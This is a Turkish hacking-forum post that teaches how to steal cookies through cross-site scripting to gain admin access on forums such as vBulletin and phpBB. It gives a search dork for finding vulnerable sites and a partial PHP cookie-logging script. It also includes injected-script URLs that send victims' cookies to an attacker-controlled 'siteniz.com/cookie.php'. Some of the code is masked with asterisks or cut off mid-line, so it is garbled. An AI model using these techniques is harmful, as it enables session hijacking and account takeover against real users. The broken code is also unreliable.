Sadece Vbulletin degil diger siteler içinde düşünülmüş çok akıllıca bir açık

Alıntı:
intext:"HTML code is On" inurl:showthread.php



Yukarıda çıkan sitelerde html kodu açık burada dilediğniz kodları çalıştırabilirsiniz.Size tavsiyem XSS cookie çalma yöntemiyle admin olmanız gerçekten çok basit yani sadece showthread.php de açık ne işimize yarar demeyin açtığınız konuya koyarsınız kodu admin gelr ...............!

Kısacası yukarıdaki sitelere





Öncelikle Cookie nedir ne işe yarar kısa bir açıklama ile konuya girmek istiyorum. Cookie nette gezinirken kullandığınız web sitelerinin sizi tanımasını sağlayan .txt uzantılı web kimliğinizdir. Bir çok mail girişinde veyahut forum girişlerinde "Beni Hatırla" seçeneğini görmüşsünüzdür mutlaka. Bu gibi işlemler kullandığınız tarayıcılar ("IE, Mozilla" gibi) bilgisayarınıza kaydederek aynı siteye birdahaki girişlerinize sizi otomatik olarak tanımanıza yardımcı olur. Bu dosyalar aynı zamanda bir forumda user mı yoksa admin olduğumuzu da tanımlayan dosyalardır.

Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.

COOKIE�Yi Nasıl Çalarız..
Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.

En basitinden
Alıntı:
**********javascript:*****(****************);</script>

java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.


Örnek:

Basit yazılmış bir script ile cookie�nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde ***** içinde yutturmanızda mümkün.




PHP Kodu:
<?php
$filename = getcwd()."\\loglarburaya.txt";


if(!file_exists($filename)){
touch($filename);
chmod($filename, 0666);
}

if (isset($_GET["cookie))
{
if (!$handle = fopen($filename, ’a�))
{
echo "Hata: Loglar dosyaya kaydedilemedi!";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie www.xxx.com/oyun.asp?id

Biz bunu önceki verdiğim örnek kodla deniyoruz;

Alıntı:
http://www.xxx.com/oyun.asp?id=*****...:*****(documen t.cookie);</script>


Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.

Baktık açığımız var. Burdan bir şekilde ***** ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.



Kod:

Alıntı:
http://www.xxx.com/oyun.asp?id=**********window.navigate("http://siteniz.com/cookie.php?cookie="+****************)</script>


Kullanıcı ya da admin bu adrese girdiğinde cookileri size gelecektir. Bu yöntemi forumlarda kullanabilirsiniz. Phpbb 2.0.16 Xss açığı ile imzaya eklediğiniz kod ile konunuza bakan tm kullanıcların cookieleri siz gelecektir. XSS geleceğin en tehlikeli açıklarından bunu söylemek yanlış olmaz çünkü bu açık sayesinde kafanıza kullanarak mail, wap serverlerına girmeniz bile mümkün gerisi sizin hayal gücünüze kalmış..
ALINTIDIR.......
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.